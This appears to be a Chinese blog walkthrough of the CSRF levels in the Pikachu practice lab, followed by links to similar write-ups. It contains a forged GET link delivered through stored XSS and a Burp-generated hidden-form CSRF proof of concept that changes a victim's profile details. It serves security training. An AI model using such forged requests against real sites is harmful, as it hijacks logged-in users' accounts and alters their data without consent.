pikachu靶场通关-CSRF跨站请求伪造

最新推荐文章于 2024-05-26 08:00:00 发布
最新推荐文章于 2024-05-26 08:00:00 发布
阅读量215 收藏
点赞数 1
分类专栏: pikachu靶场通关 文章标签: csrf web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43381463/article/details/128999071
版权

CSRF

0x00 跨站请求伪造

Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个 攻击就完成了。所以CSRF攻击也成为"one click"攻击。很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。

攻击者: allen---->123456

被攻击者: kobe---->123456

0x01 CSRF(get) login

前期埋点

1、攻击者登录后获取修改信息的链接http://XXXXX/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=435434553&phonenum=136sad&add=4354343&email=345343&submit=submit

2、将链接通过存储型XSS存入网页中

image-20230211145725484

猎物上钩

1、受害者登录页面

2、浏览时发现攻击者埋的点,好奇心驱使他去点击

3、结果信息被修改

image-20230211150133535

0x02 CSRF(post) login

埋点

1、攻击者登录后通过存储型XSS埋点

<a href="http://XXXXX/csrf/pk_csrf.html">post</a>

pk_csrf.html内容:

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
 <form action="http://XXXXXX/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
   <input type="hidden" name="sex" value="4354aa553" />
   <input type="hidden" name="phonenum" value="136sad" />
   <input type="hidden" name="add" value="435aaa3" />
   <input type="hidden" name="email" value="34aa43" />
   <input type="hidden" name="submit" value="suaait" />
   <input type="submit" value="Submit request" />
 </form>
</body>
</html>

上钩

1、受害者登录页面

2、浏览时发现攻击者埋的点,好奇心驱使他去点击

3、结果信息被修改

image-20230211150133535

0x03 CSRF Token login

贫僧法号云空丶
关注
专栏目录
pikachu通关教程(CSRF
Bu2n的博客
12-08 1422
CSRF(get)CSRF(post)CSRF Token CSRF(get) 登录vince的账号 修改手机号 抓包看到是个get请求 打开一个新网页,利用上面的参数,构造一个url,这里我把手机号改为120(这里是模拟钓鱼网站跳转到恶意的url) 手机号修改成功 CSRF(post) 登录vince账号,尝试修改信息,抓包,发现是post请求 这下就不能直接用url跳转进行CSRF攻击了,得伪造一个表单页面,让用户去访问。 表单代码如下 js代码意思是当页面加载完毕,自动点击提交按钮,.
pikachu靶场通关CSRF(1),2024年最新oppo网络安全面试
2401_83973995的博客
04-13 539
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。
pikachu靶场-3 跨站请求伪造CSRF
weixin_52180702的博客
12-12 672
这个get请求实际上是向后台传递了刚才的所有参数,而且我们并没有在这个提交的参数里看到csrf token,也就是说后台这里是没有做一些防CSRF的措施的,同时他又是通过get请求来提交的,如果有人相对它进行修改,他就只需要获取到这个链接,然后就可以对一些地方进行修改,然后通过邮件,聊天工具等发送给受害者,受害者点击后就会被修改信息。get型的CSRF是比较好利用的,我们只需要伪造这个链接,然后把我们想要修改的参数修改掉,然后发送给带登录态的攻击者,他只要点击,这个请求就完成了,这个攻击也完成了。
pikachu靶场通关CSRF
Python毕设源码程序王哥
04-12 1765
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。
pikachu-CSRF通关教程
m0_71518346的博客
12-09 620
概念:也被称为“One Click Attack”或者“Session Riding”,通过伪装来自受信任用户的请求来攻击受信任的网站。
[PiKaChu靶场通关]CSRF
网络安全知识分享
10-12 4116
[PiKaChu靶场通关]CSRF一、介绍二、攻击细节三、防御措施检查Referer字段添加校验token四、靶场内容CSRF(GET) 一、介绍 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网
攻防系列——pikachu靶场通关练习
weixin_43140411的博客
10-23 2029
从来没有哪个时代的黑客像今天一样热衷于猜解密码 ---奥斯特洛夫斯基
pikachu靶场csrf通关
05-06
Pikachu靶场是一个用于学习网络安全的虚拟...通关Pikachu靶场中的CSRF挑战需要先了解什么是CSRF漏洞,然后通过修改请求参数等手段来伪造请求,实现攻击目标网站。具体的挑战流程可以参考Pikachu靶场中的提示和指引。
pikachu靶场通过教程
热门推荐
玄道的网安博客
04-23 2万+
目录 暴力破解 XSS CSRF SQL注入 RCE 文件包含 不安全的文件下载 不安全的文件上传 越权 目录遍历 敏感信息泄露 PHP反序列化 XXE URL重定向 SSRF 暴力破解 暴力破解简单概述 点开基于表单的暴力破解,像我们日常登录的用户密码 我们简单输入admin,admin,错误提示 输入admin,123456,成功提示...
pikachu通关3 -CSRF
m0_62677808的博客
12-09 206
我们先根据右边的提示登录用户我们点击修改个人信息,然后用burpsuite抓包我们把请求的链接复制出来然后对链接进行修改将这个链接复制到pikachu的浏览器然后回车,我们的信息也被修改了。
pikachu靶场中的CSRF、SSRF通关
最新发布
qq_68163788的博客
05-26 2040
Pikachu靶场中,CSRF(Cross-Site Request Forgery)和SSRF(Server-Side Request Forgery)是两种常见的Web安全漏洞。CSRF攻击利用用户在已认证的Web应用程序上执行未经意的操作,通过伪装请求来执行恶意操作,例如更改用户密码或发送资金。而SSRF漏洞则允许攻击者从受害服务器上执行请求,可能导致访问内部系统、绕过防火墙或执行其他恶意操作。
Pikachu靶场通关笔记--Cross-site request forgery (CSRF
weixin_45908624的博客
12-08 259
CSRF
pikache靶场通关——CSRF攻击
p36273的博客
07-01 1594
靶场一共又三关,现在我们就来通关吧。
Pikachu系列——CSRF
Zlirving_的博客
05-15 1270
Pikachu靶场系列持续更新~   要像追剧追番一样追下去哦   实验三 —— CSRF CSRF概述 跨站请求伪造简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。 CSRF类型判断 GET: 先去掉参数尝试能否正常请求。如果可以,即存在CSRF漏洞。 POST: 如果有token等验证参数,先去掉参数尝试能否正常请求。如果可以,再去掉referer参数的内容,如果仍然可以,说
pikachu靶场通关(上)
qq_65950075的博客
04-08 917
第一关:暴力破解1.1基于表单的暴力破解首先打开burp suite拦截,然后在随意输入账号密码,可在burpsuite上抓到皮卡丘的包,可以看到刚才输入的账号密码我们选择放包,然后看到提示“用户名或密码不存在”,说明刚刚随便输入的账号密码是错的(废话)这怎么办呢,可以看到右上角有提示,我们点开发现三个账号密码,其中肯定有一个是正确的,当然我们可以一个一个地试。但是数量多的话我们就不好试了。把这三个记下来,下面用到。再次随便输入账号密码,拦截抓包发送攻击类型选择集束炸弹。
pikachu通关记之CSRF跨站请求伪造
qq_35258210的博客
01-17 337
"""本人网安小白,此贴仅作为记录我个人测试的思路、总结以便后期复习;今后本着少就是多,慢就是快的方式一步一个脚印进行学习,把这个知识点学扎实了,再学另外一个知识点。费曼教授是不是曾经说过以教代学是最好的学习方式?有很多错点可圈可指,所以也请dalao指出不对的地方,所谓教他人的时候也是在稳固自身""" 未做严格排版,后面有时间了再来整理整理 目录 CSRF(get请求CSRF(POST请求CSRF Token Ps:靶机链接:在我博客置顶 实战环境下需要有这以下四个角色 被攻击者、
pikachu靶场- CSRF闯关,文件包含、文件上传
akucoco的博客
02-11 651
pikachu靶场- CSRF闯关,文件包含、文件上传
pikachu靶场通关记录
weixin_45682839的博客
04-01 2657
pikachu靶场通关记录
pikachu靶场--CSRF--get/post/token【3.1】~【3.3】
lmei1228的博客
06-08 284
当然,如果小黑事先在xxx网的首页如果发现了一个XSS漏洞,则小黑可能会这样做: 欺骗小白访问埋伏了XSS脚本(盗取cookie的脚本)的页面,小白中招,小黑拿到小白的cookie,然后小黑顺利登录到小白的后台,小黑自己修改小白的相关信息。---所以跟上面比一下,就可以看出CSRF与XSS的区别:CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的权限,而XSS是直接盗取到了用户的权限,然后实施破坏。所以小黑想要修改大白的信息,他需要拥有:1,登录权限 2,修改个人信息的请求
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值